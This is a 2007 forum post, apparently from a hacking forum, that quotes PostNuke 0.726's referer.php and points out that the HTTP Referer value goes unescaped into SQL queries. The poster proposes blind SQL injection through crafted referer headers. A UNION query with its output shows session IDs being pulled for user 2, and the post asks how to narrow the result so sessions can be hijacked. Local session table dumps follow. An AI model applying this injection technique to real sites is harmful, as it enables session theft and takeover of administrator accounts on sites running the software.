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PostNuke 0.726
PostPosted: Sat Jun 02, 2007 8:13 pm Reply with quote
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If you don't have PostNuke-0.726.tar.gz, just google it! Smile

Excerpt from referer.php :
Code:

/***
* Lets select from the table where we have $HTTP_REFERER (whether it be
* a valid referer or 'bookmark'. if we return 1 row, that means someones
* used this referer before and update the set appropriatly.
*
* If we dont have any rows (it returns 0), we have a new entry in the
* table, update accordingly.
*
* After we figure out what SQL statement we are using, lets perform the
* query and we're done !
*/

$check_sql = "SELECT count($column[rid]) as c
FROM $pntable[referer]
WHERE $column[url] = '" . $HTTP_REFERER . "'";
$result = $dbconn->Execute($check_sql);
if ($result === false) {
PN_DBMsgError($dbconn, __FILE__, __LINE__, "Error accesing to the database");
}
$row = $result->fields;
$count = $row[0];

if ($count == 1 ) {
$update_sql = "UPDATE $pntable[referer]
SET $column[frequency] = $column[frequency] + 1
WHERE $column[url] = '" . $HTTP_REFERER . "'";
} else {

/***
* "auto-increment" isn't portable so we have to use the standard
* interface for grabbing sequence numbers. The underlying
* implementation handles the correct method for the RDBMS we are
* using.
*/

$rid = $dbconn->GenId($pntable['referer'], true);
$update_sql = "INSERT INTO $pntable[referer]
($column[rid],
$column[url],
$column[frequency])
VALUES
(" . pnVarPrepForStore($rid). ",
'" . pnVarPrepForStore($HTTP_REFERER) . "',
1)";
}

$result = $dbconn->Execute($update_sql);
if ($result === false) {
error_log ("error in referer.php, " . __LINE__ . ", sql='$update_sql'");
PN_DBMsgError($dbconn, __FILE__, __LINE__, "Error accesing to the database");
}

if ( $DEBUG == 1) {
echo "<br>".$check_sql."<br>".$update_sql."<br>";

}
}
}


This is a great job for (not Superman) Blind SQL Injection. It's possible with craftly modified referers

SQL:
Code:

UPDATE $pntable[referer]
SET $column[frequency] = $column[frequency] + 1
WHERE $column[url] = '" . $HTTP_REFERER . "'


Try#1:
Code:

mysql> select count(pn_rid) from nuke_referer where pn_url = 'bookmarkz' union all select pn_sessid from nuke_session_info where pn_uid = 2 and '1' = '1';

Result:
Code:

+----------------------------------+
| count(pn_rid) |
+----------------------------------+
| 0 |
| bb816071d1a45a3909d068006fa6da3c |
| 71aa76010a67eaaa55ed022be7a4761e |
+----------------------------------+

How can I limit the result?

Another infos:
Code:

mysql> select * from nuke_referer;
+--------+----------+--------------+
| pn_rid | pn_url | pn_frequency |
+--------+----------+--------------+
| 1 | bookmark | 21 |
+--------+----------+--------------+

Sessions:
Code:

mysql>select pn_sessid,pn_ipaddr from nuke_session_info;
+----------------------------------+-----------+--------+
| pn_sessid | pn_ipaddr | pn_uid |
+----------------------------------+-----------+--------+
| bb816071d1a45a3909d068006fa6da3c | 127.0.0.1 | 2 |
| 71aa76010a67eaaa55ed022be7a4761e | 127.0.0.1 | 2 |
| 90b3f0d35b2dd582c99e176653a19ed1 | 127.0.0.1 | 0 |
| 401bb0de7e55b5f0718e697afef59d0e | 127.0.0.1 | 0 |
| 5c5ccf872e219943eca85fde06b929f8 | 127.0.0.1 | 0 |
+----------------------------------+-----------+--------+

and
mysql> select pn_firstused,pn_lastused,pn_vars from nuke_session_info;
+--------------+-------------+--------------------------------------------------
+
| pn_firstused | pn_lastused | pn_vars
|
+--------------+-------------+--------------------------------------------------
+
| 1180804898 | 1180812208 | PNSVrand|i:16031;PNSVlang|s:3:"eng";PNSVuid|i:2;
|
| 1180805276 | 1180813491 | PNSVrand|i:27561;PNSVlang|s:3:"eng";PNSVuid|i:2;
|
| 1180810251 | 1180810253 | PNSVrand|i:16094;PNSVlang|s:3:"eng";
|
| 1180812224 | 1180812473 | PNSVrand|i:7944;PNSVlang|s:3:"eng";
|
| 1180812536 | 1180812561 | PNSVrand|i:25239;PNSVlang|s:3:"eng";
|
+--------------+-------------+--------------------------------------------------



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